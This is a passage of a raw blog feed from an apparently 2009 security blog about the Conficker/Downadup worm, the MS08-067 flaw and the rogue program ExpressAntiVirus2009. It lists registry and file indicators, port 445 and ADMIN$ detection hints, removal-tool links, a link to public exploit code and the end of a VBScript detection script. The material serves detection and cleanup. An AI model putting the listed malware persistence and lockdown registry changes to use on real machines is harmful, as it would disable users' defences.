&gt;&lt;span style=""&gt;                &lt;/span&gt;END SELECT&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt; &lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;Next&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt; &lt;/span&gt;&lt;/h4&gt;  &lt;div  style="border-style: none none double; padding: 0in 0in 1pt;color:-moz-use-text-color -moz-use-text-color windowtext;"&gt;  &lt;h4 style="border: medium none ; margin: 0in 0in 0.0001pt; padding: 0in;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;MsgBox "Trojan Entries Found:" &amp;amp; vbcrlf &amp;amp; dwValue0 &amp;amp; vbcrlf &amp;amp; dwValue1 &amp;amp; vbcrlf &amp;amp; dwValue2&lt;/span&gt;&lt;/h4&gt;  &lt;/div&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt; &lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-size:10;"&gt;References&lt;/span&gt;&lt;/h4&gt;  &lt;p class="MsoNormal" style="margin-left: 1in; text-indent: -0.25in;"&gt;&lt;span style="font-size:10;"&gt;&lt;span style=""&gt;1.&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;        &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:10;"&gt;Worm:Win32/Conficker.A (&lt;a href="http://www.microsoft.com/security/portal/Entry.aspx?Name=Worm%3aWin32%2fConficker.A"&gt;Microsoft&lt;/a&gt;)&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 1in; text-indent: -0.25in;"&gt;&lt;span style="font-size:10;"&gt;&lt;span style=""&gt;2.&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;        &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:10;"&gt;Worm:Win32/Conficker.B (&lt;a href="http://www.microsoft.com/security/portal/Entry.aspx?Name=Worm:Win32/Conficker.B"&gt;Microsoft&lt;/a&gt;)&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 1in; text-indent: -0.25in;"&gt;&lt;span style="font-size:10;"&gt;&lt;span style=""&gt;3.&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;        &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:10;"&gt;Backdoor:Win32/IRCbot.BH (&lt;a href="http://www.microsoft.com/security/portal/Entry.aspx?Name=Backdoor%3aWin32%2fIRCbot.BH"&gt;Microsoft&lt;/a&gt;)&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 1in; text-indent: -0.25in;"&gt;&lt;span style="font-size:10;"&gt;&lt;span style=""&gt;4.&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;        &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:10;"&gt;&lt;a href="http://blogs.technet.com/mmpc/archive/2008/11/25/more-ms08-067-exploits.aspx"&gt;http://blogs.technet.com/mmpc/archive/2008/11/25/more-ms08-067-exploits.aspx&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal" style="margin-left: 1in; text-indent: -0.25in;"&gt;&lt;span style="font-size:10;"&gt;&lt;span style=""&gt;5.&lt;span style=";font-family:&amp;quot;;font-size:7;"  &gt;        &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:10;"&gt;&lt;a href="http://blogs.technet.com/mmpc/archive/2008/11/17/a-quick-update-about-ms08_2D00_067-exploits.aspx"&gt;http://blogs.technet.com/mmpc/archive/2008/11/17/a-quick-update-about-ms08_2D00_067-exploits.aspx&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal" style="margin-left: 0.75in;"&gt;&lt;span style="font-size:10;"&gt; &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: -0.25in;"&gt;&lt;span style="font-size:10;"&gt; &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: -0.25in;"&gt;&lt;span style="font-size:10;"&gt; &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size:10;"&gt; &lt;/span&gt;&lt;/p&gt;   &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-6245861376373602139?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/6245861376373602139/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=6245861376373602139' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/6245861376373602139'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/6245861376373602139'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2009/01/found-bot-and-botnet-related-to_04.html' title='W32.Downadup and W32.Downadup.B related Bot and Botnet.....'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-438070264016373434</id><published>2009-01-02T22:17:00.001-08:00</published><updated>2009-01-05T02:55:32.479-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Remote Memory Corruption Vulnerability'/><category scheme='http://www.blogger.com/atom/ns#' term='WORM_DOWNAD.A'/><category scheme='http://www.blogger.com/atom/ns#' term='Net-Worm.Win32.Kido.l'/><category scheme='http://www.blogger.com/atom/ns#' term='Removal tool for w32.downadup.b'/><category scheme='http://www.blogger.com/atom/ns#' term='security updates for w32.downadup.b'/><category scheme='http://www.blogger.com/atom/ns#' term='W32/Conficker mem svchost.exe'/><category scheme='http://www.blogger.com/atom/ns#' term='removal tool virus W32.Downadup.B'/><category scheme='http://www.blogger.com/atom/ns#' term='ms-08067 exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='W32.Downadup.B'/><category scheme='http://www.blogger.com/atom/ns#' term='W32.Downadup.B microsoft removal tools'/><category scheme='http://www.blogger.com/atom/ns#' term='W32.Downadup'/><category scheme='http://www.blogger.com/atom/ns#' term='W32.Downadup.B + removal tools'/><category scheme='http://www.blogger.com/atom/ns#' term='W32/Confick-A'/><category scheme='http://www.blogger.com/atom/ns#' term='w32.downadup.b removal tool'/><category scheme='http://www.blogger.com/atom/ns#' term='Downadup'/><category scheme='http://www.blogger.com/atom/ns#' term='MS 08-067'/><category scheme='http://www.blogger.com/atom/ns#' term='Downadup.B'/><title type='text'>W32.Downadup.B registry removal tool available......</title><content type='html'>Hi, just was going through the symantec site for some more intel on W32.Downadup.B, came accross a registry removal tool for the W32.Downadup.B. There is also some bot and botnet related activity found kindly visit the bellow link for full details.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://wormsandexploits.blogspot.com/2009/01/found-bot-and-botnet-related-to_04.html"&gt;http://wormsandexploits.blogspot.com/2009/01/found-bot-and-botnet-related-to_04.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Kindly find it here with removal instruction.&lt;br /&gt;&lt;a href="http://www.symantec.com/security_response/writeup.jsp?docid=2004-050614-0532-99"&gt;http://www.symantec.com/security_response/writeup.jsp?docid=2004-050614-0532-99&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-438070264016373434?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/438070264016373434/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=438070264016373434' title='13 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/438070264016373434'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/438070264016373434'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2009/01/w32downadupb-registry-removal-tool.html' title='W32.Downadup.B registry removal tool available......'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>13</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-169933674658947359</id><published>2009-01-02T01:35:00.000-08:00</published><updated>2009-01-02T01:44:16.054-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Rouge Software'/><category scheme='http://www.blogger.com/atom/ns#' term='ExpressAntiVirus2009'/><title type='text'>Rouge software detected ExpressAntiVirus2009</title><content type='html'>&lt;div style="text-align: justify;"&gt;There is a new Rouge software detected at the begining of new year, this is named as &lt;span style="font-weight: bold;"&gt;ExpressAntiVirus2009&lt;/span&gt;. This is being detected by multiple antivirus vendors as Misleading application.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_U1qHrwW7q_k/SV3hVTITCRI/AAAAAAAAM5A/N4no44Tt4F4/s1600-h/expressantivirus.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 290px; height: 204px;" src="http://4.bp.blogspot.com/_U1qHrwW7q_k/SV3hVTITCRI/AAAAAAAAM5A/N4no44Tt4F4/s200/expressantivirus.jpg" alt="" id="BLOGGER_PHOTO_ID_5286629293631408402" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;It creates the following entries in various places.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;It creates the following files:&lt;br /&gt;%ProgramFiles%\exav\av.ini&lt;br /&gt;%ProgramFiles%\exav\base.dll&lt;br /&gt;%ProgramFiles%\exav\borlndmm.dll&lt;br /&gt;%ProgramFiles%\exav\expressav.exe&lt;br /&gt;&lt;br /&gt;It  also create files in the %Temp% folder.&lt;br /&gt;&lt;br /&gt;It also creates the following registry entry so that it executes whenever Windows starts:&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"av" = "C:\Program Files\exav\expressav.exe"&lt;br /&gt;&lt;br /&gt;It modifies the following registry entries:&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\"NoFind" = "1"&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\"NoRun" = "1"&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\"NoSMHelp" = "1"&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\"NoSetFolders" = "1"&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\"NoViewOnDrive" = "3FFFFFF"&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\"DisableRegistryTools" = "1"&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\"DisableTaskMgr" = "1"&lt;br /&gt;HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions\"NoBrowserOptions" = "1"&lt;br /&gt;&lt;br /&gt;a removal instruction is being given by symantec.&lt;br /&gt;&lt;a href="http://www.symantec.com/business/security_response/writeup.jsp?docid=2008-123111-2625-99&amp;amp;tabid=3"&gt;http://www.symantec.com/business/security_response/writeup.jsp?docid=2008-123111-2625-99&amp;amp;tabid=3&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-169933674658947359?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/169933674658947359/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=169933674658947359' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/169933674658947359'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/169933674658947359'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2009/01/there-is-new-rouge-software-detected-at.html' title='Rouge software detected ExpressAntiVirus2009'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_U1qHrwW7q_k/SV3hVTITCRI/AAAAAAAAM5A/N4no44Tt4F4/s72-c/expressantivirus.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-1391583079547293293</id><published>2009-01-02T00:28:00.001-08:00</published><updated>2009-01-04T22:48:35.741-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Remote Memory Corruption Vulnerability'/><category scheme='http://www.blogger.com/atom/ns#' term='Net-Worm.Win32.Kido.l'/><category scheme='http://www.blogger.com/atom/ns#' term='security updates for w32.downadup.b'/><category scheme='http://www.blogger.com/atom/ns#' term='W32/Conficker mem svchost.exe'/><category scheme='http://www.blogger.com/atom/ns#' term='MS 08067 virus'/><category scheme='http://www.blogger.com/atom/ns#' term='removal tool virus W32.Downadup.B'/><category scheme='http://www.blogger.com/atom/ns#' term='RPC Exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='W32/Conficker'/><category scheme='http://www.blogger.com/atom/ns#' term='W32.Downadup.B microsoft removal tools'/><category scheme='http://www.blogger.com/atom/ns#' term='W32.Downadup.B'/><category scheme='http://www.blogger.com/atom/ns#' term='W32.Downadup'/><category scheme='http://www.blogger.com/atom/ns#' term='W32.Downadup.B + removal tools'/><category scheme='http://www.blogger.com/atom/ns#' term='ms exploit 08067'/><category scheme='http://www.blogger.com/atom/ns#' term='w32.downadup.b removal tool'/><category scheme='http://www.blogger.com/atom/ns#' term='Downadup'/><category scheme='http://www.blogger.com/atom/ns#' term='MS 08-067'/><category scheme='http://www.blogger.com/atom/ns#' term='ms 08-067 exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='Downadup.B'/><category scheme='http://www.blogger.com/atom/ns#' term='RPC Memory corruption'/><title type='text'>The Activity Increased on Port 445..Due to W32.Downadup.B</title><content type='html'>After the release of the new variant the activity on port 445/TCP has been increased.&lt;br /&gt;See the graph at SANS diary from Dec 30th till Jan 01.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://isc.sans.org/portascii.html?port=445&amp;amp;start=2008-12-30&amp;amp;end=2009-01-01"&gt;http://isc.sans.org/portascii.html?port=445&amp;amp;start=2008-12-30&amp;amp;end=2009-01-01&lt;/a&gt;&lt;br /&gt;This clearly tells us that the worm is still on the move.&lt;br /&gt;Also look for my earlier two posts on this for details.&lt;br /&gt;&lt;br /&gt;This new variant of W32.Downadup is also capable of the following&lt;br /&gt;&lt;ul&gt;&lt;li&gt;It can disable Windows Update&lt;/li&gt; &lt;li&gt;Block access to anti-virus web sites&lt;/li&gt;&lt;li&gt;Perform brute force attacks on local windows and shared drives on the network&lt;/li&gt;&lt;li&gt;Finding the local IP address and and then changing the desktop firewall rules to allow access to remote attackers&lt;/li&gt; &lt;li&gt;Finally Creating a web server on the local computer for using it to infect more systems. &lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Look for the following Registry Modifications for the presence of this worm&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\&amp;lt;%random_dllname%&amp;gt;&lt;br /&gt;DisplayName = ""&lt;/li&gt;&lt;li&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\&amp;lt;%random_dllname%&amp;gt;&lt;br /&gt;Type = dword:00000020&lt;/li&gt;&lt;li&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\&amp;lt;%random_dllname%&amp;gt;&lt;br /&gt;Start = dword:00000002&lt;/li&gt;&lt;li&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\&amp;lt;%random_dllname%&amp;gt;&lt;br /&gt;ErrorControl dword:00000000&lt;/li&gt;&lt;li&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\&amp;lt;%random_dllname%&amp;gt;&lt;br /&gt;ImagePath = "%SystemRoot%\system32\svchost.exe -k netsvcs"&lt;br /&gt;&lt;/li&gt;&lt;li&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\&amp;lt;%random_dllname%&amp;gt;&lt;br /&gt;ObjectName = "LocalSystem"&lt;/li&gt;&lt;li&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Nls&lt;br /&gt;(Default) = dword:%Number%&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;Some workarounds and a detailed information is available here&lt;br /&gt;&lt;a href="http://blogs.technet.com/swi/archive/2008/10/23/More-detail-about-MS08-067.aspx"&gt;http://blogs.technet.com/swi/archive/2008/10/23/More-detail-about-MS08-067.aspx&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;There is a removal tool virus W32.Downadup.B being posted by F-Secure&lt;br /&gt;&lt;a href="ftp://ftp.f-secure.com/anti-virus/tools/DownadupRemovalTool.zip"&gt;ftp://ftp.f-secure.com/anti-virus/tools/DownadupRemovalTool.zip&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-1391583079547293293?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/1391583079547293293/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=1391583079547293293' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/1391583079547293293'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/1391583079547293293'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2009/01/activity-increased-on-port-445due-to.html' title='The Activity Increased on Port 445..Due to W32.Downadup.B'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-3827947874609885279</id><published>2009-01-01T00:06:00.001-08:00</published><updated>2009-01-04T22:48:35.758-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Net-Worm.Win32.Kido.l'/><category scheme='http://www.blogger.com/atom/ns#' term='security updates for w32.downadup.b'/><category scheme='http://www.blogger.com/atom/ns#' term='W32/Conficker mem svchost.exe'/><category scheme='http://www.blogger.com/atom/ns#' term='MS 08067 virus'/><category scheme='http://www.blogger.com/atom/ns#' term='RPC Exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='W32/Conficker'/><category scheme='http://www.blogger.com/atom/ns#' term='ms-08067 exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='W32.Downadup.B microsoft removal tools'/><category scheme='http://www.blogger.com/atom/ns#' term='W32.Downadup.B'/><category scheme='http://www.blogger.com/atom/ns#' term='W32.Downadup'/><category scheme='http://www.blogger.com/atom/ns#' term='MS-08067'/><category scheme='http://www.blogger.com/atom/ns#' term='W32.Downadup.B + removal tools'/><category scheme='http://www.blogger.com/atom/ns#' term='W32/Confick-A'/><category scheme='http://www.blogger.com/atom/ns#' term='w32.downadup.b removal tool'/><category scheme='http://www.blogger.com/atom/ns#' term='Downadup'/><category scheme='http://www.blogger.com/atom/ns#' term='microsoft ms 08067'/><category scheme='http://www.blogger.com/atom/ns#' term='MS 08-067'/><category scheme='http://www.blogger.com/atom/ns#' term='new worm'/><category scheme='http://www.blogger.com/atom/ns#' term='Downadup.B'/><category scheme='http://www.blogger.com/atom/ns#' term='scanner for ms 08-067'/><category scheme='http://www.blogger.com/atom/ns#' term='RPC Memory corruption'/><title type='text'>Just some updates about the W32.Downadup.B......</title><content type='html'>Hey guys just thought to update you all on the trends of this latest worm,&lt;br /&gt;Just try to look for symptoms where there is a large scan for &lt;b&gt;Port 445/TCP&lt;/b&gt;&lt;br /&gt;(Remember its a RPC exploit) on your network, this means the worm is&lt;br /&gt;looking for a vulnerable machine, also you can look IDS/IPS the logs for the&lt;br /&gt;presence of connection attempts to &lt;b&gt;ADMIN$&lt;/b&gt;, remember again that this new&lt;br /&gt;variant tries to exploit the admin$ with weak passwords, so the another thing&lt;br /&gt;which you may want to co-relate with the logs are the failed attempts to logon&lt;br /&gt;to the network shares along with the attempt to &lt;b&gt;ADMIN$&lt;/b&gt;, also try to look for&lt;br /&gt;presence of &lt;b&gt;"\\Pipe\\browser"&lt;/b&gt; in the session data for the suspected logs.&lt;br /&gt;&lt;br /&gt;Reference:&lt;br /&gt;&lt;br /&gt;See the exploit code.&lt;br /&gt;&lt;a href="http://www.milw0rm.com/exploits/7104"&gt;http://www.milw0rm.com/exploits/7104&lt;/a&gt;&lt;br /&gt;&lt;a href="http://wormsandexploits.blogspot.com/2008/12/yet-another-variant-of-w32downadup-just.html"&gt;http://wormsandexploits.blogspot.com/2008/12/yet-another-variant-of-w32downadup-just.html&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-3827947874609885279?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/3827947874609885279/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=3827947874609885279' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/3827947874609885279'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/3827947874609885279'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2009/01/just-some-updates-about-w32downadupb.html' title='Just some updates about the W32.Downadup.B......'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-2662182708662057256</id><published>2008-12-31T00:25:00.000-08:00</published><updated>2009-01-04T22:48:35.763-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='WORM_DOWNAD.A'/><category scheme='http://www.blogger.com/atom/ns#' term='Net-Worm.Win32.Kido.l'/><category scheme='http://www.blogger.com/atom/ns#' term='security updates for w32.downadup.b'/><category scheme='http://www.blogger.com/atom/ns#' term='W32/Conficker mem svchost.exe'/><category scheme='http://www.blogger.com/atom/ns#' term='MS 08067 virus'/><category scheme='http://www.blogger.com/atom/ns#' term='RPC Exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='W32/Conficker'/><category scheme='http://www.blogger.com/atom/ns#' term='ms-08067 exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='W32.Downadup.B microsoft removal tools'/><category scheme='http://www.blogger.com/atom/ns#' term='W32.Downadup.B'/><category scheme='http://www.blogger.com/atom/ns#' term='W32.Downadup'/><category scheme='http://www.blogger.com/atom/ns#' term='MS-08067'/><category scheme='http://www.blogger.com/atom/ns#' term='W32.Downadup.B + removal tools'/><category scheme='http://www.blogger.com/atom/ns#' term='ms exploit 08067'/><category scheme='http://www.blogger.com/atom/ns#' term='W32/Confick-A'/><category scheme='http://www.blogger.com/atom/ns#' term='w32.downadup.b removal tool'/><category scheme='http://www.blogger.com/atom/ns#' term='Downadup'/><category scheme='http://www.blogger.com/atom/ns#' term='microsoft ms 08067'/><category scheme='http://www.blogger.com/atom/ns#' term='MS 08-067'/><category scheme='http://www.blogger.com/atom/ns#' term='new worm'/><category scheme='http://www.blogger.com/atom/ns#' term='ms 08-067 exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='Downadup.B'/><category scheme='http://www.blogger.com/atom/ns#' term='scanner for ms 08-067'/><category scheme='http://www.blogger.com/atom/ns#' term='RPC Memory corruption'/><title type='text'>Yet another variant of W32.Downadup Just before new year....... W32.Downadup.B</title><content type='html'>&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5CDEEPAY%7E1%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;style&gt; &lt;!--  /* Font Definitions */  @font-face 	{font-family:Wingdings; 	panose-1:5 0 0 0 0 0 0 0 0 0; 	mso-font-charset:2; 	mso-generic-font-family:auto; 	mso-font-pitch:variable; 	mso-font-signature:0 268435456 0 0 -2147483648 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:&amp;quot;&amp;quot;; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:&amp;quot;Times New Roman&amp;quot;; 	mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;} a:link, span.MsoHyperlink 	{color:blue; 	text-decoration:underline; 	text-underline:single;} a:visited, span.MsoHyperlinkFollowed 	{color:purple; 	text-decoration:underline; 	text-underline:single;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 63.0pt 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;}  /* List Definitions */  @list l0 	{mso-list-id:775831934; 	mso-list-template-ids:1753781294;} @list l0:level1 	{mso-level-number-format:bullet; 	mso-level-text:; 	mso-level-tab-stop:.5in; 	mso-level-number-position:left; 	text-indent:-.25in; 	mso-ansi-font-size:10.0pt; 	font-family:Symbol;} @list l1 	{mso-list-id:993140303; 	mso-list-template-ids:-819026018;} @list l1:level1 	{mso-level-number-format:bullet; 	mso-level-text:; 	mso-level-tab-stop:.5in; 	mso-level-number-position:left; 	text-indent:-.25in; 	mso-ansi-font-size:10.0pt; 	font-family:Symbol;} ol 	{margin-bottom:0in;} ul 	{margin-bottom:0in;} --&gt; &lt;/style&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:85%;"&gt;Yet another variant of W32.Downadup right before the new year, its now W32.Downadup.B as reported by Symantec which is trying to exploit with the earlier version of MS-08067 (you can refer to my earlier post on &lt;a href="http://wormsandexploits.blogspot.com/2008/11/new-worm-attack-nov-2008-exploting.html"&gt;Nov 25&lt;sup&gt;th&lt;/sup&gt;&lt;/a&gt; on this issue) Server service vulnerability, one such POC is been given by &lt;a href="http://www.securityfocus.com/bid/31874/info"&gt;SecurityFocus on Oct 24&lt;/a&gt;. &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:85%;"&gt; &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:85%;"&gt;As far&lt;/span&gt;&lt;span style="font-size:85%;"&gt;  &lt;/span&gt;&lt;span style="font-size:85%;"&gt;as I understood from the Symantec Security response posting on this new variant, it exploits the systems and spread via network shares with weak passwords and blocks access to security-related Web sites too, the worm has a feature to delete all restore points, which is really bad. All major versions of windows are effected by this if not yet patched. &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:85%;"&gt; &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:85%;"&gt;You can check for the presence of this virus by checking on the following locations for the specific files mentioned.&lt;/span&gt;&lt;/p&gt;  &lt;ul&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;%ProgramFiles%\Internet      Explorer\[RANDOM FILE NAME].dll&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;%ProgramFiles%\Movie      Maker\[RANDOM FILE 